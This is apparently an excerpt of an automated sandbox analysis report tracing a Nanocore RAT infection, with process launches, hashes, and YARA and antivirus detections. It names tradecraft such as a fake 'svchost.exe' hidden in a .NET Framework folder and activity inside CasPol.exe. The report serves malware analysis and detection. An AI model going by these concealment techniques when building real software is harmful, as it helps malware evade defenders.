MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:21
Start date:25/02/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
Imagebase:0x7ff6fee60000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:22
Start date:25/02/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:0x7ff6fee60000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:23
Start date:25/02/2021
Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
Imagebase:0xa80000
File size:38008 bytes
MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 28%, ReversingLabs
Reputation:low

General

Start time:15:10:26
Start date:25/02/2021
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:0x4f0000
File size:107624 bytes
MD5 hash:F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:moderate

General

Start time:15:10:27
Start date:25/02/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:0x7ff6eb840000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:28
Start date:25/02/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
Imagebase:0x1b0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:29
Start date:25/02/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
Imagebase:0x7ff6fee60000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:15:10:30
Start date:25/02/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
Imagebase:0x1b0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

General

Start time:15:10:32
Start date:25/02/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:0x7ff6fee60000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:15:10:34
Start date:25/02/2021
Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
Imagebase:0xa0000
File size:38008 bytes
MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Disassembly

Code Analysis